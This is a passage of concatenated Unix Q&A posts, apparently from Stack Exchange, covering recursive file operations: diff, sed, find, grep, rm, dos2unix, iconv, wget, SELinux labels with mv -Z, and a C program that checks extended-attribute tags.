You don't need any of that, just use diff -qr dir1 dir2. For example:
$ tree
.
├── dir1
│ ├── file1
│ ├── file3
│ ├── file4
│ ├── file6
│ ├── file7
│ ├── file8
│ └── subdir1
│ ├── dsaf
│ ├── sufile1
│ └── sufile3
└── dir2
├── file1
├── file2
├── file3
├── file4
├── file9
└── subdir1
├── sufile1
└── sufile3
4 directories, 16 files
If I now run diff -qr (-r for "recursive" and -q to only report when the files differ, and not show the actual differences) on the two directories, I get:
$ diff -qr dir1/ dir2/
Only in dir2/: file2
Only in dir1/: file6
Only in dir1/: file7
Only in dir1/: file8
Only in dir2/: file9
Only in dir1/subdir1: dsaf
That said, the way to get a list of files is find:
$ find dir1 -type f
dir1/subdir1/dsaf
dir1/subdir1/sufile1
dir1/subdir1/sufile3
dir1/file6
dir1/file1
dir1/file8
dir1/file4
dir1/file7
dir1/file3
Then, you can remove the dir1/ and dir2/ using sed, and compare the output of two directories using process substitution in a shell that supports it:
$ comm -3 <(find dir1 -type f | sed 's|dir1/||' | sort) <(find dir2 -type f | sed 's|dir2/||' | sort)
file2
file6
file7
file8
file9
subdir1/dsaf
Note that this assumes file names with no newline characters. If you need to handle those, just use the diff -r approach above.
| Recursively list path of files only |
1,475,911,180,000 |
I am doing some pre-processing on files. I have 2 text files which contains data in the following format.
Text File 1
"Name","Age","Class"
"Total Students:","247"
"John","14","8"
"Sara","13","8"
Text File 2
"Name","Age","Class"
"Total Students:","119"
"John","15","9"
"Sara","16","9"
What I am trying to do is I am removing top 2 rows from these files and quotes and then moving the files to the output directory by using the following commands.
sed '1d' "$file" >> temp.txt
sed -i '1d' temp.txt
sed -i 's/"//g' temp.txt
mv temp.txt output/$file
The problem I am facing is that, these commands only apply to a single file. The file names are Class_8.txt and Class_9.txt. Is there any solution I can apply same command to both files? I wanted to retain the orignal file and move the processed files to output folder.
|
You can't conveniently run sed on multiple files and get it to write to more than one file in one go (if the input and output need to be separate files). It's possible using non-standard extensions or by hard-coding the names of the output files in the sed expressions.
Your operations are so simple though that we may want to use tail and tr in a loop instead:
for file in Class_{8,9}.txt; do
tail -n +3 "$file" | tr -d '"' >output/"$file"
done
Or, if you really want to use sed,
for file in Class_{8,9}.txt; do
sed -e '1,2d' -e 's/"//g' "$file" >output/"$file"
done
You could also copy the files first, then run sed with in-place editing in one go on the copies. This delegates, in a sense, the loop to the inner workings of GNU sed.
cp Class_{8,9}.txt output
sed -i -e '1,2d' -e 's/"//g' output/Class_{8,9}.txt
Note that removing the double quotes would mean writing invalid CSV output if any fields contain embedded commas or newlines. To delete only the unneeded double quotes, use CSV parser such as csvformat from csvkit.
The above commands all assume that output is an existing directory that you are allowed to create files in.
| Apply same sed command on multiple text files |
1,475,911,180,000 |
I have a folder with a whole lot of folders with a whole lot of Markdown files in each. What I'd like to do is recursively (if possible) prepend the file name as a heading in each file.
So, given foo.md:
The cat sat on the carpet, which is really just endless mat to a cat.
I'd like:
# Foo.md
The cat sat on the carpet, which is really just endless mat to a cat.
I'm not bothered about the file extension. I am bothered that it is a valid Markdown heading 1 with a line afterwards.
My file structure looks like
md/
foo/
heaps.md
and.md
bar/
heaps.md
of.md
baz/
files.md
omg.md
and so on and so forth. Ideally, I'd love something that I can copy into a .sh or similar, but a one-liner would be nice too!
Cheers.
|
Try bash's globstar and ed plus some P.E., I suggest you try with some sample data/directory first.
shopt -s globstar
for f in md/**/*.md; do
header=${f##*/} header=${header^}
printf '%s\n' 0a "# $header" "" . w | ed -s "$f"
done
Or the one liner but remember to set globstar
for f in md/**/*.md; do header=${f##*/} header=${header^}; printf '%s\n' 0a "# $header" "" . w | ed -s "$f" ; done
To check the content of the files while globstar is still on you could try.
tail -n+1 md/**/*.md
0 is the address or line number in the buffer and a is the action which means append or add
The extra "" is to create an empty line before the next line in the file.
Although 1i (which means Insert at line number one) instead of 0a will work also but for empty files it will fail.
. tells ed that were done editing the file and w means write it to the file
piping | to ed and -s which means silent and not output anything to stdout.
The rest is just some variable assigiment and P.E. from the bash shell.
| Append file name to beginning of [Markdown] file recursively |
1,475,911,180,000 |
I have a PHP application with is located on Linux with multiple directories (and sub-directories) and many PHP, JS, HTML, CSS, etc files. Many of the files have Windows EOL control characters and I am also concerned that some might not be UTF-8 encoded but maybe ISO-8859-1, Windows-1252, etc. My desire is to convert all files to UTF-8 with LF only.
Looks like I might have a couple steps.
The dos2unix man provides this solution:
find . -name *.txt |xargs dos2unix
https://stackoverflow.com/a/11929475 provides this solution:
find . -type f -print0 | xargs -0 dos2unix
https://stackoverflow.com/a/7068241 provides this solution:
find ./ -type f -exec dos2unix {} \;
I recognize the first will only convert txt files which isn't what I want but I can easily change to target all files using -type f. That being said, is one solution "better" than the other? If so, why? Is it possible to tell which files will be changed without changing them? When I finally change them, I don't want the date to change, and intend to use dos2unix's --keepdate flag. Should any other options be used?
Next, I will need to deal with encoding. https://stackoverflow.com/a/805474/1032531 recommends enca (or its sister command encov) and https://stackoverflow.com/a/64889/1032531 recommends iconv. It also seems like file might be applicable. Again, which one (or maybe something else all together) should be used? I installed enca and when executing enca --list languages, it lists several languages but not english (maybe choose "none"?), and I question is applicability. iconv was already installed, however, it does not have a man page (at least man iconv doesn't result in one). How can this be used to recursively check and convert encoding?
Please confirm/correct my proposed solution or provide a complete solution.
|
There's quite a few questions here rolled into one.
Firstly when using find I would always use --exec instead of xargs. As a general rule it's better to do things in as few commands as possible. But also the first two methods write all the file names out to a text stream ready for xargs to re-interpret back into file names. Its a needless step which only adds (addmittedly small) opportunity to fail.
dos2unix will accept multiple file names so I would use:
find . -type f -exec dos2unix --keepdate {} +
This will stack up long lists of files and then kick off dos2unix on a whole bunch of them at once.
To Find out which files will be touch just drop the exec clauses:
find . -type f
Encoding changes are far more problematic. Please be aware that there is no way to reliably determine the current encoding of any text file. It can sometimes be guessed but that is never 100% reliable. So you can only batch process encoding if you are sure all the files are currently the same encoding.
I would recommend using iconv. It really is the default too for this job. You can find a man page for it here:
https://linux.die.net/man/1/iconv
There's a working example of how to use iconv with find here:
https://stackoverflow.com/questions/4544669/batch-convert-latin-1-files-to-utf-8-using-iconv
| Recursively converting Windows files to Unix files |
1,475,911,180,000 |
mv -Z applies the default selinux context. Does it differ from all other invocations of mv, and work on all the files in a moved directory individually?
|
Yes.
$ mkdir a
$ touch a/b
$ ls -Z -d a a/b
unconfined_u:object_r:user_home_t:s0 a
unconfined_u:object_r:user_home_t:s0 a/b
$ strace -f mv -Z a ~/.local/share/Trash/files
...
open("/home/alan/.local/share/Trash/files/a/b", O_RDONLY|O_NOFOLLOW) = 3
...
fgetxattr(3, "security.selinux", "unconfined_u:object_r:user_home_t:s0", 255) = 37
fsetxattr(3, "security.selinux", "unconfined_u:object_r:data_home_t:s0", 37, 0) = 0
...
$ cd ~/.local/share/Trash/files
$ ls -Zd a a/b
unconfined_u:object_r:data_home_t:s0 a
unconfined_u:object_r:data_home_t:s0 a/b
This also introduced the possibility that moving a directory within a single filesystem will fail part-way through. I.e. due to lack of disk space when changing the labels. The impact of this is mitigated as the relabel happens as a second step. The initial move operation is still by a single atomic rename. This means the labels would be inconsistent, but the files will be consistent in every other way. It should be simple to fix the labels once space becomes available.
| Does `mv --context` (for selinux, a.k.a. -Z) correctly apply labels recursively to directory contents? |
1,475,911,180,000 |
I saw some of the posts on this website about how to download files from a directory recursively. So, I executed the following line:
wget -r -nH --cut-dirs=3 -A '*.bz2' -np http://www.xfce.org/archive/xfce-4.6.2/src/
It only downloads the index page and then deletes it automatically.
Output:
--2016-07-01 16:56:02-- http://www.xfce.org/archive/xfce-4.6.2/src/
Resolving www.xfce.org (www.xfce.org)... 138.48.2.103
Connecting to www.xfce.org (www.xfce.org)|138.48.2.103|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://archive.xfce.org/xfce/4.6.2/src/ [following]
--2016-07-01 16:56:17-- http://archive.xfce.org/xfce/4.6.2/src/
Resolving archive.xfce.org (archive.xfce.org)... 138.48.2.107
Connecting to archive.xfce.org (archive.xfce.org)|138.48.2.107|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘index.html’
index.html [ <=> ] 8.05K --.-KB/s in 0.03s
2016-07-01 16:56:23 (247 KB/s) - ‘index.html’ saved [8239]
Removing index.html since it should be rejected.
FINISHED --2016-07-01 16:56:23--
Total wall clock time: 21s
Downloaded: 1 files, 8.0K in 0.03s (247 KB/s)
The web-directory contains a lot of tar.bz2 files. Can anyone tell me where I'm going wrong?
My wget version is 1.16.3
|
Seems like it is not trivial to get directory listing over http; I could get the bz2 files using bellow:
wget -k -l 0 "http://archive.xfce.org/xfce/4.6.2/src/" -O index.html ; cat index.html | grep -o 'http://archive.xfce.org/xfce/4.6.2/src/[^"]*.bz2' | uniq -c | xargs wget
| wget not downloading files recursively |
1,475,911,180,000 |
I have a root folder with a text file in it called pairs.txt.
Within that root folder are other folders with text files called pairs.txt in them.
Is there a simple way to remove them using rm?
I know that there I could use find . -name 'pairs.txt' -exec rm {} \; but I would like to know of other ways, perhaps using * or some other wildcard?
I tried using rm -rf pairs.txt but it seems to only remove the pairs.txt in the current directory.
|
With bash 4+:
shopt -s globstar dotglob
rm -- **/pairs.txt
The globstar option makes ** match any number of directory levels. The dotglob option makes it include directories whose name begins with . (dot files).
With ksh93, use set -o globstar instead of shopt -s globstar. To get the effect of dotglob, use FIGNORE=.
With zsh, use the second line directly. To include dot files, run setopt glob_dots first or make the second line rm -- **/pairs.txt(D).
Note that bash's ** follows symbolic links to directories. Ksh's and zsh's don't.
| Removing specific files recursively using rm or something simple? |
1,475,911,180,000 |
I have downloaded about 3200 websites to the depth 2. So now I have one master folder (abc) that contains many folders, containing files for each website. So my folder abc contains 3200 folders and each folder contains other folders that contains files with text from the websites. I have also a script that can edit text in each file. It is stored in file named lynx.sh:
#!/bin/bash
fileA=$1
while IFS= read -r lineA
do
LTRA=$(echo "${lineA:0:1}")
catA=$(lynx -dump -nonumbers -nomargins -nolist -noprint -width 1000 -assume_charset=utf-8 $2/*.* )
editA=$(echo "$catA" | sed -e 's/\[[^][]*\]//g')
editB=$(echo "$editA" | sed -e 's/\s\+/\n/g')
editC=$(echo "$editB" | sed '/^http/ d' )
editD=$(echo "$editC" | sed '/^IFRAME/ d' )
editE=$(echo "$editD" | sed 's/<[^>]*>//g' )
editF=$(echo "$editE" | sed -r 's/[^aáäbcčdďdzdžeéfghchiíjklĺľmnňoópqrŕsštťuúvwxyýzžAÁÄBCČDĎDZDŽEÉFGHCHIÍJKLĹĽMNŇOÓPQRŔSŠTŤUÚVWXYÝZŽ][^aáäbcčdďdzdžeéfghchiíjklĺľmnňoópqrŕsštťuúvwxyýzžAÁÄBCČDĎDZDŽEÉFGHCHIÍJKLĹĽMNŇOÓPQRŔSŠTŤUÚVWXYÝZŽ]+//g' )
editG=$(echo "$editF" | sed s'/[^aáäbcčdďdzdžeéfghchiíjklĺľmnňoópqrŕsštťuúvwxyýzžAÁÄBCČDĎDZDŽEÉFGHCHIÍJKLĹĽMNŇOÓPQRŔSŠTŤUÚVWXYÝZŽ]$//')
editH=$(echo "$editG" | sed s'/^[^aáäbcčdďdzdžeéfghchiíjklĺľmnňoópqrŕsštťuúvwxyýzžAÁÄBCČDĎDZDŽEÉFGHCHIÍJKLĹĽMNŇOÓPQRŔSŠTŤUÚVWXYÝZŽ]//')
editI=$(echo "$editH" | sed 's/ .*//')
editJ=$(echo "$editI" | sed '/^$/d' )
echo "$editJ" > $2/"blaaa"_lynx.txt
echo "$lineA"
done <"$fileA"
It makes text in each file to be edited - every word is on the new line. I have used this script many times before but I use it with file input.txt which contains names of all websites that i have.
Now I am trying to edit all folders in my abc folder at once. I have tried to use somtehing like this:
find /home/student/eny/abc -exec lynx.sh {} \;
find /home/student/eny/abc/* -iname -exec ./lynx.sh input.txt {} \;
and many others. I can not find a solution for this.
In input.txt there are names of sites for example: kosice.sk bratislava.sk presov.sk every name of the site is on a new line and they are in aplhabet order. And they are also as names of dir of the first level.
|
Here is the final version of your command
find /home/student/eny/abc -type f -exec ./lynx.sh {} \;
Points to note:
-type f finds files only
you should specify path to your script ./ (dot slash) means current dir, you may want to specify the full path
lynx.sh should have executable bit set file mode 0755 would be fine
| How to find files and act on them (find + exec) |
1,425,972,805,000 |
Suppose, we have the following files in a directory:
test.txt
test.txt~
/subdir
test1.txt
test1.txt~
When I run rm -r ./*.*~ inside top dir only test.txt~ is removed.
Why doesn't it perform the recursive removal despite the fact that I used recursive flag?
You can reproduce my case with the following script:
#create dir and 1-st level test files
mkdir dir
cd dir
touch test.txt
touch test.txt~
#create subdir and 2-nd level test files
mkdir subdir
cd subdir/
touch test1.txt~
touch test1.txt
cd ..
rm -r ./*.*~
|
*.*~ does not expand to any directories, it will just match any file or directory in the current directory that has a . in it somewhere and ends in ~
If you would like to find all the files that end in ~ from the directory you're in I would use find like
find -type f -name '*~' -delete
| Recursive rm doesn't work for me |
1,425,972,805,000 |
If I make a .tar.gz via
tar czvf - ./myfiles/ | pigz -9 -p 16 > ./mybackup.tar.gz,
Can I safely unzip an already gzip'd file ./myfiles/an_old_backup.tar.gz within the ./myfiles directory via
gzip -d mybackup.tar.gz
tar -xvf mybackup.tar
cd myfiles
gzip -d an_old_backup.tar.gz
tar -xvf an_old_backup.tar
? And can one do this recursive compression safely ad infinitum?
|
If your question can be rephrased as "is it OK to have compressed
archives within compressed archives?", then the answer is "yes".
This may not be the most convenient (as you note, you will have to run
tar several files to get everything unpacked), and applying
compression to data that has already been compressed may not yield an
additional reduction in size, but it will all work.
| Is it safe to do recursive compression with tar, gzip and pigz? |
1,425,972,805,000 |
How can I delete all 'nohup.out' files within a directory recursively from my terminal? I'm using CentOS.
|
There can't be multiple files named nohup.out in a single directory, so I assume you mean that you want to remove it recursively:
find . -name nohup.out -exec rm {} +
If you are using GNU find, you can use -delete:
find . -name nohup.out -delete
In bash4+, you can also use globstar:
shopt -s globstar dotglob
rm -- **/nohup.out
Note, however, that globstar traverses symlinks when descending the directory tree, and may break if the length of the file list exceeds the limit on the size of arguments.
| Delete all 'nohup.out' within a directory recursively |
1,425,972,805,000 |
How can I do a fast text replace with recursive directories and filenames with spaces and single quotes? Preferably using standard UNIX tools, or alternatively a well-known package.
Using find is extremely slow for many files, because it spawns a new process for each file, so I'm looking for a way that has directory traversing and string replacement integrated as one operation.
Slow search:
find . -name '*.txt' -exec grep foo {} \;
Fast search:
grep -lr --include=*.txt foo
Slow replace:
find . -name '*.txt' -exec perl -i -pe 's/foo/bar/' {} \;
Fast replace:
# Your suggestion here
(This one is rather fast, but is two-pass and doesn't handle spaces.)
perl -p -i -e 's/foo/bar/g' `grep -lr --include=*.txt foo`
|
You'd only want to use the:
find . -name '*.txt' -exec cmd {} \;
form for those cmds that can only take one argument. That's not the case of grep. With grep:
find . -name '*.txt' -exec grep foo /dev/null {} +
(or use -H with GNU grep). More on that at Recursive grep vs find / -type f -exec grep {} \; Which is more efficient/faster?
Now for replacement, that's the same, perl -pi can take more than one argument:
find . -name '*.txt' -type f -exec perl -pi -e s/foo/bar/g {} +
Now that would rewrite the files regardless of whether they contain foo or not. Instead, you may want (assuming GNU grep and xargs or compatible):
find . -name '*.txt' -type f -exec grep -l --null foo {} + |
xargs -r0 perl -pi -e s/foo/bar/g
Or:
grep -lr --null --include='*.txt' foo . |
xargs -r0 perl -pi -e s/foo/bar/g
So only the files that contain foo be rewritten.
BTW, --include=*.txt (--include being another GNU extension) is a shell glob, so should be quoted. For instance, if there was a file called --include=foo.txt in the current directory, the shell would expand --include=*.txt to that before calling grep. And if not, with many shells, you'd get an error about the glob failing to match any file.
So you'd want grep --include='*.txt'
| Fast string replace in recursive directories |
1,425,972,805,000 |
I'm having trouble with grep's manner of interpreting "recursive" searching compared to cp. Maybe it's just that I use them differently.
In this, grep seems to interpret "recursive" differently from cp. Is that correct? (my question)
Per my Question to navigate through this on SO...
With files containing the grep-matched string:
./file1.js
./file2.php
./inc/file3.js
./inc/file4.php
./inc.php/file5.php
grep -R "find me" *.php
Returns:
./file2.php
./inc.php/file5.php
...because grep wants to match both directories and files containing ".php"
But, if I use cp to copy recursively, say:
cp -r inc/* ~/mywork/
Files in the "inc" folder will be copied, along with all directories et cetera, albeit not hidden files, regardless of whether they have "inc" in their name.
Do grep and cp have different meanings of "recursive" or do they treat "recursive" the same? Could someone help me understand how different path/file arguments are interpreted by cp and grep the same way?
|
Your grep command,
grep -R "find me" *.php
... contains a filename globbing pattern, *.php. This will be expanded by the shell before the shell executes grep, so the actual command at execution may look something like
grep -R "find me" file1.php file2.php inc.php
... where inc.php happens to be a directory name.
The grep utility would then search the given files for the expression that you provided. For directories mentioned on the command line, it would search all files and subdirectories beneath the directory for files with contents matching the expression. This means you would have found a match in inc.php/subdir/README had that file contained the string find me.
In short: Process (search for matching lines within) each name given on the command line according to the given options (recursively).
The cp command works the same way with regards to recursive actions:
cp -r inc/* ~/mywork/
The shell would expand the above command to something like
cp -r inc/file1 inc/file2 inc/dir1 inc/dir2 /home/myself/mywork/
The cp utility would then, for each individually named file or directory, copy that file or directory recursively to the destination directory.
In short: Process (copy to destination) each name given on the command line according to the given options (recursively).
Additional notes:
The support in grep for searching recursively is a non-standard extension.
Filename globbing patterns that may expand to names starting with a dash should be handled with care to not be confused with command-line options. Your grep command is, therefore, more safely written as
grep -R -- "find me" *.php
or as
grep -R -e "find me" -- *.php
... where -- delimits the options and their arguments from the non-option operands. Your cp command does not have that issue, as the globbing pattern is guaranteed to expand to something starting with the string inc/.
| Do grep and cp treat "recursive" the same? |
1,425,972,805,000 |
I have a bash script below that is intended to curl against a list of domains, from a file, and output the results.
#!/bin/bash
baseurl=https://csp.infoblox.com
domains=/home/user/Documents/domainlist
B1Dossier=/tide/api/data/threats/state/host?host=$domains
APIKey=<REDACTED>
AUTH="Authorization: Token $APIKey"
for domain in $domains; do curl -H "$AUTH" -X GET ${baseurl}${B1Dossier} > /tmp/outputfile; done
Unfortunately, the script is not going through each domain in the file whatsoever.
To help understand, I have listed the expectation/explanation of the script:
Within the file, /home/user/Documents/domainlist, I have a handful of domains.
I'm attempting to use the API to check each domain in the file, by appending the variable $domains at the end of B1Dossier
The expectation is that it would run the specified curl command against each domain, within the file, and output the results.
For added visibility, I included the working curl command used for a single domain below:
curl -H 'Authorization: Token <REDACTED>' -X GET https://csp.infoblox.com/tide/api/data/threats/state/host?host=<place domain here>
Can someone assist in what I'm doing wrong and how I can fix this?
|
You can read the domains from file to an array and loop for them.
baseurl="https://csp.infoblox.com"
B1Dossier="/tide/api/data/threats/state/host?host="
url="${baseurl}${B1Dossier}"
# read domains to an array
mapfile -t domains < /home/user/Documents/domainlist
# loop for domains
for d in "${domains[@]}"; do
curl -H "$AUTH" -X GET "${url}${d}" >> temp
done
Notes:
In your command, using B1Dossier into the loop, has no effect, it seems you were waiting some kind of a recursive evaluation, because the domain is contained in B1Dossier and you loop for domain. But your url doesn't change inside the loop this way.
Also, you have to append the responses to your destination file using >> or else every next response would overwrite the previous one.
| Curl against list domains from a file not working |
1,425,972,805,000 |
I want to recursively crawl a directory and if the file has \x58\x46\x53\x00 as the first 4 bytes, I want to run strings on the file.
|
h_signature=$(echo 58465300 | tr 'a-f' 'A-F')
read -r x a b x <<<$(od --endian=big -N 4 -t x2 yourfile | tr 'a-f' 'A-F')
case "$a$b" in "$h_signature" ) strings yourfile ;; esac
Meth-2:
dd if=yourfile count=4 bs=1 2>/dev/null |
perl -lpe '$_ = uc unpack "H*"' | xargs test "$h_signature" = && strings yourfile
Meth-3:
head -c 4 yourfile | xxd -ps -g 4 | grep -qwi "$h_signature" && strings yourfile
| If file data starts with a certain hex sequence, run strings command on the file |
1,425,972,805,000 |
I have a filestructure with several subfolders where I'd like to search for all subfolder containing a certain string ("sub*") and then move all of the files in these found folders up one level from each of their respective location. And even potentially delete the then empty folder but I could do that with a second step as well.
|
This should do it:
find /path/to/base/folder/ -type d -name 'sub*' -exec bash -c 'mv {}/* "$(dirname {})"' \;
NOTE: this will not move hidden files (whose name start with .)
| Move Files from Directory up one level |
1,425,972,805,000 |
A previous answer to a post mentions to run sha1 hashes on an images of a dd drive clone image.
Another answer to that post suggests mounting the dd image an then compare if the sha1 hashes of "important files" matches.
I want to use the second approach, but instead of manually selecting files I would like to use a bunch of randomly selected files.
Assuming I have two mounted partitions, can I select a bunch of random files and compare the sha1 hashes and stop with an error if a hash is not equal?
Out put should be roughly similar to this, if all goes well:
OK: all 10000 randomly selected files have matching sha1 sums for partitions sda and sdb
Or the output should only be in case of an error and show the filename that has a different sha1 sum on both partitions.
Current code in progress:
#!/bin/bash
N=5
mydir="/home"
dirlisting=`find $mydir |sort -R |tail -$N`
for fname in $dirlisting
do
echo $fname
done
|
As I understand your question you want to find out whether N random files differ between two file system paths. Comparing the files should be faster than calculating checksums of both files. Here is how you can do it:
#!/bin/sh
list1=/tmp/list1
list2=/tmp/list2
shuflist=/tmp/shuflist
n=100000 # How many files to compare.
if test ! -d "$1" -o ! -d "$2"; then
echo "Usage: $0 path1 path2"
exit 1
fi
exitcode=0
(cd "$1" && find . -type f >"$list1") || exit 1
(cd "$2" && find . -type f >"$list2") || exit 1
if cmp -s "$list1" "$list2"; then
shuf -n "$n" "$list1" > "$shuflist"
while IFS= read -r filename; do
if ! cmp -s "$1/$filename" "$2/$filename"; then
echo "Files '$1/$filename' and '$2/$filename' differ."
exitcode=1
break
fi
done < "$shuflist"
else
echo File lists differ.
exitcode=1
fi
rm "$list1" "$list2" "$shuflist"
exit $exitcode
Beware that this script assumes that none of your file names contain a newline character.
| check two partitions by selecting random files and running sha1 hashes on two files of each partition |
1,425,972,805,000 |
I am replicating a server -> I want to delete all the files inside the folders and the subfolders, without deleting the directories themselves.
Example:
home\apps\Batches\hello.txt
home\apps\Batches\test\text.txt
Output:
home\apps\Batches\
home\apps\Batches\test\
Only the files should be deleted.
|
Using \ to separate directory name components is a windows thing.
I would do something like:
find . -type f -delete
Note: That command is highly dangerous, be sure you really want to do it, and make sure you're in the correct directory (as I tell find to start in . the correct directory is the root of the subtree that should be emptied.
| Delete all the files in a folder and its subfolders without deleting the folder structure |
1,425,972,805,000 |
I am trying to find all the files in a directory structure which contain a specific word, but it is not working correctly.
For example: when run from the path /Institute/IITDhanbad/, the command
grep -rn "Programmer" *
giving result as
BTECH/CompScience.txt:22: Sudip is a Programmer
However, when run from the path /Institute/IITDhanbad/MTECH, the same command gives
CSP/Boys/Good/Electronics.txt:13: Sourav is a Programmer
The problem is, that the expected result when running the grep call in /Institute/IITDhanbad/ folder was to have both results, i.e.
BTECH/CompScience.txt:22: Sudip is a Programmer
MTECH/CSP/Boys/Good/Electronics.txt:13: Sourav is a Programmer
What is going wrong and how to resolve this?
Some additional info:
The file type and access permissions are:
File
Mode
MTECH
drwxrwsr-x
BTECH
drwxrwsr-x
CSP
lrwxrwxrwx
ls -ld in /Institute/IITDhanbad/ path:
drwxrwsr-x 4 suresh faculty 4096 Sep 16 00:53
ls -ld in /Institute/IITDhanbad/MTECH path:
drwxrwsr-x 4 suresh faculty 4096 Sep 16 00:53
ls -ld in /Institute/IITDhanbad/MTECH/CSP path:
dr-xr-sr-t 4 ganesh faculty 4096 Sep 12 20:58 .
|
CSP is a symlink (see l in lrwxrwxrwx). Apparently your grep does not follow symlinks with -r, except symlinks provided as arguments. When you do:
grep -rn "Programmer" *
in the parent directory of CSP (i.e. in /Institute/IITDhanbad/MTECH/, right?), CSP appears as an argument after the shell expands *. But if you do this one directory "higher" (in /Institute/IITDhanbad/) then CSP is not an argument, it's a symlink encountered by grep during its recursive scanning.
GNU grep works this way. Is your grep GNU grep? If so, see the manual for -R. -R is like -r but it does follow symlinks.
Note if you did grep -rn "Programmer" . in the parent directory of CSP then CSP would not appear as an argument. The usage of * was crucial for what you observed.
| "grep -rn" only yields one of two expected results |
1,425,972,805,000 |
I'm using Bash on Ubuntu on Windows to run linux commands on my windows system. It seems to work just like Ubuntu so for all intents and purposes I'm on ubuntu here I guess.
I'm trying to use strings to dump all the strings across a bunch of files in a directory/its subdirectories to a single file.
I'm using this thread as a guide
Only problem is my results will typically generate outputs that are tens of gigabytes in size (before I kill the program) that seem to come from infinite loops of copying the same files over and over again.
This is what I've tried:
> strings -e S ./* > all.bin.jp.txt
> strings -e S ./** > all.bin.jp.txt
> find . -type f -exec strings -e S {} \; >> all.jp.txt
> find ./* -type f -exec strings -e S {} \; >> all.jp.txt
> find . -type f -exec strings -e S {} \; > all.jp.txt
> for file in ./*; do strings -e S "$file" >> all.bin.txt; done
> for file in ./**; do strings -e S "$file" >> all.bin.txt; done
> for file in ./*/*; do strings -e S "$file" >> all.bin.txt; done
I don't remember which command did it but I think the last one actually finished and gave me a file that was a few gigabytes, even though it opened easily in Notepad++. But I noticed that like 70% of that file was the same line repeated over and over again.
I've run these commands INSIDE the directory I want to get all the files, and all the files from the subdirectories, from. E.g.,
Parent Directory
--Directory of Interest
---file1
---file2
---subdirectory1
------fileA1
------fileA2
---subdirectory2
------fileB1
So from Parent Directory I type cd Directory of Interest, and then I run the command, and I want everything from file1, file2, fileA1, fileA2, and fileB1 to be dumped to a single file also inside Directory of Interest, at the same level as file1 and file2.
I'm also confused about what level to execute the command at. I don't actually care where I execute the command or if the file gets placed e.g. directly inside Parent Directory - this is just what I've tried. I don't usually have trouble running strings on all files in the current directory, using commands like the below inside the directory with all the files of interest but this subdirectories thing has me stumped.
strings -e S . > all.bin.jp.txt
strings -e S *.bin > all.bin.jp.txt
Please help me! I remember this used to work when I tried it before, but I don't remember the exact command I used. I've tried it on a couple different directories with the same types of files I've used this command on before, but it won't work for any of them, so I don't know what's wrong.
|
The find command works fine, you only need to exclude all.jp.txt from the list of files to be found or redirect the output to a different directory, i.e. not . or one of its sub-directories. Otherwise strings also runs on all.jp.txt and grows and grows.
find . -type f ! -path ./all.jp.txt -exec strings -e S {} \; > all.jp.txt
or
find . -type f -exec strings -e S {} \; > /some/other/dir/all.jp.txt
| Output file blows up when trying to find strings on bash on ubuntu on windows |
1,425,972,805,000 |
I wrote an executable that I want to execute on all the files contained in a directory.
This is what the program looks like:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/xattr.h>
#include <string.h>
#include <errno.h>
int main(int argc, char const *argv[]){
char argNormaux[4096] = {0};
char argNeg[4096] = {0};
char argEt[4096] = {0};
int nbArgsNormaux = 0;
if (argc > 2){
for (int i = 2; i < argc; i++){
const char *arg = argv[i];
if (strstr(argv[i],"et") != NULL){
strcat(argEt, argv[i]);
}
else if (strstr(argv[i], "!") != NULL){
strcat(argNeg, argv[i]);
}
else {
strcat(argNormaux, argv[i]);
nbArgsNormaux++;
}
}
const char *path = argv[1];
char buf[4096];
int rc;
rc = listxattr(path, buf, sizeof(buf));
if (rc < 0){
perror("listxattr");
}
else {
if (strlen(buf) == 0){
printf("No tag.\n");
return 1;
}
int tagsNormauxCheck = 0;
int tagsNegCheck = 0;
char *token = buf;
while(*token){
char tagBuf[4096];
if (strlen(token) == 2){
if (strcmp(token, "\0\0\0")) break;
}
rc = getxattr(path, token, &tagBuf, sizeof(tagBuf));
if (rc < 0){
perror("getxattr");
}
else {
if (strstr(argNormaux, tagBuf) != NULL) {
tagsNormauxCheck++;
}
if (strstr(argNeg, tagBuf) != NULL) {
tagsNegCheck = 1;
break;
}
}
memset(&tagBuf, 0, sizeof(tagBuf));
token = strchr(token, '\0');
token++;
}
if (tagsNormauxCheck == nbArgsNormaux && tagsNegCheck == 0){
printf("Le fichier %s possède la combinaison des tags donnés.", path);
}
}
}
else {
printf("Pas assez d'arguments.");
}
return 0;
}
This is the command line I'm trying to use :
find . -type f -exec ./logic testDir/ essai '{}' \;
What I'm expecting is to have the logic executable applied on every files in that testDir, but what it does is that it applies it directly on testDir for each file there is in that dir, which is not what I want... I've been trying to make it work for days, it's just annoying, logic work perfectly fine when applied on a single file. So I don't know what should I do to achieve what I want. The file argument on which logic is applied doesn't change with that command.
EDIT : Adding more context on what I want to achieve, the purpose of logic and how I want it to work.
logic is a program that shows if a file have the combinaiton of the extended arguments passed to logic. One example of execution of logic alone is : logic testfile.txt programming class university \!art. So basically: tell me if testfile.txt has the combination of tags programming and class and university and not art.
Now let's say I have a directory such as :
testDir/
├── dir2
│ ├── dir2file1.txt
│ ├── dir2file2.txt
│ └── dir2file3.txt
├── file1.txt
├── file2.txt
├── file3.txt
└── file4.txt
1 directory, 7 files
I want logic to be executed on each file present in that directory tree. (folders excluded)
So basically, my problem here is that the file argument passed to logic when using find isn't changing. It will stay testDir/, but I'd like it to be testDir/file1.txt, then testDir/file2, until it reaches dir2file3.txt.
Anyway to make it work please?
Thanks.
|
It looks as if you want the file path to be the first argument to your program:
find testDir -type f -exec ./logic {} essai \;
This will search the directory testDir (as well as any subdirectory of testDir) for regular files, and for each found file, it will call your program with the pathname of the file as the first argument (and with essai as the second argument).
The difference between this and your own command,
find . -type f -exec ./logic testDir/ essai '{}' \;
is that
The pathname of the found file is passed as the last command line argument,
The first argument is always testdir/,
You search the current directory (and its subdirectories).
| How to execute recursively a program on every files contained in directory with find |
1,425,972,805,000 |
I want to run this:
grep -r zlib *.cpp
But this fails unless there is a .cpp file in the current directory (in which case only it is searched):
grep: *.cpp: No such file or directory
Now:
grep -r zlib *
Does search through the whole hierarchy but I want to limit the search to (eg) .cpp files.
Looked through man and a lot of recipe sites but cannot find an answer to what I assume is a simple query - so apologies in advance.
|
It has nothing do with grep, but with your current shell. The shell expands *.cpp to all the cpp file names in your current directory before running the grep command. Since it can't find any filenames, the glob *.cpp is left unexpanded by the shell. The grep command tries to see this is a file, but cribs that it is not a real file.
You have couple of options, use find
